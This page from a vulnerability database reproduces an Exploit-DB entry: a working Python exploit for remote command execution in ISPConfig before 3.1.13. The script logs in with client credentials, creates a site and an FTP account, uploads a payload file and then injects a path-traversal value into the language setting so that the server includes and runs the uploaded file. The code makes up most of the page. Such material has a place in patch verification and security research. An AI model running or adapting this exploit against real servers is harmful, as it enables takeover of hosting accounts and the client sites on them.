Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ISPConfig < 3.1.13 - Remote Command Execution

🗓️ 05 Oct 2018 00:00:00Reported by 0x09ALType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

There is remote command execution vulnerability in ISPConfig < 3.1.13 due to improper validation of language input, allowing an attacker to compromise client accounts

Code
# Title: ISPConfig < 3.1.13 - Remote Command Execution
# Author: 0x09AL 
# Date: 20/08/2018
# Vendor: https://www.ispconfig.org/
# 
# Vulnerability Description
#
# There is an include on almost all the php files, which includes the language template.
# For example:

# In password_reset.php - Line 46 the following code tries to include the filename 
# that is specified in the $_SESSION['s']['language'] variable.
#
# include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng';
# 
# Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php
# if(preg_match('/[a-z]{2}/',$_POST['language'])) {
#            $_SESSION['s']['user']['language'] = $_POST['language'];
#            $_SESSION['s']['language'] = $_POST['language'];
#        } else {
#            $app->error('Invalid language.');
#        }
# 
# The regex checks if the language contains two lower-case characters.
# The problem is that everything that contains two [a-z] characters will match the regex.
# Developer probably missed the ^ $ on the regex to match the entire file.
#
# Since in the new versions of php we can not use null byte injections, either a path-truncation attack
# we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code 
# will get executed as the ispconfig account and not as our chroot-ed account.
#
# This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise
# the entire clients.
#
# You need to specify the hostname:port , username, and password of the client.

import requests
import ftplib
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


host = "host:8080"
username = "username"
password = "password"

exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
ftp_username = "randomusr1"
domain = "pwned.com"
site_id = 1
payload_name = "pwned1"
path = ""



def login():
  r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False)
  if(r.text.find("wrong")>0):
    print "[-] Incorrect credentials [-]"
  else:
    print "[+] Logged in Succesfully [+]"


def createSite():
  
  r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False)
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  pass

def createFtp():
  global site_id
  r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False)
  print "[+] Getting IDSof the sites [+]"
  temp_array = r.text.split('<option value=')
  nr_sites = len(temp_array)
  print "[+] Number of sites %d [+]" % (int(nr_sites) - 1)
  # Find the latest created site by checking the ID.
  max_id = -9999

  for i in range(1,nr_sites):
    temp = int(temp_array[i].split('>')[0].replace("'",""))
    if(temp > max_id):
      max_id = temp
  site_id = max_id
  print "[+] Newly created site id is : %d [+]" % site_id
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  r = exp.post('https://%s/sites/ftp_user_edit.php' % host,data={'parent_domain_id':site_id,'username':'%s' % ftp_username,'password':'%s' % password,'repeat_password':'%s' % password,'quota_size':1024,'active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  print "[+] Created FTP Account [+]"
  pass


def uploadPayload():
  ftp = ftplib.FTP(host.split(":")[0])
  ftp.login(username+ftp_username, password)
  ftp.cwd("web")
  ftp.storlines("STOR %s.lng" % payload_name,open("test.txt"))
  print "[+] Payload %s uploaded Succesfully [+]" % payload_name
  pass

def waitTillCreation():
  while 1:
    print "[+] Trying [+]"
    r = exp.get('https://%s/datalogstatus.php' % host,verify=False)
    temp = json.loads(r.text)
    if(temp["count"] == 0):
      print "[+] Everything created .... [+]"
      return
    time.sleep(5)

def getRelativePath():
  
  global path

  r = exp.get('https://%s/sites/web_vhost_domain_edit.php?id=%d&type=domain' % (host,site_id),verify=False)
  path = r.text.split('Document Root</label>')[1].split('<div class="col-sm-9">')[1].split('<')[0]
  path += "/web/" + payload_name
  print "[+] Uploading payload in %s [+]" % path

def triggerVuln():
  r = exp.get('https://%s/tools/user_settings.php' % host,verify=False)
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  user_id = r.text.split('name="id" value="')[1].split('"')[0]
  r = exp.post('https://%s/tools/user_settings.php' % host,data={'passwort':'','repeat_password':'','language':'../../../../../../../../../../../../../..%s' % path,'id':'%s' % user_id,'_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  r = exp.get('https://%s/index.php'% host,verify=False)
  print r.text

login()
createSite()
createFtp()
getRelativePath()
waitTillCreation()
uploadPayload()
triggerVuln()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Oct 2018 00:00Current
7.4High risk
Vulners AI Score7.4
remote command executionispconfigvulnerabilityimproper validationlanguage inputclient compromise
23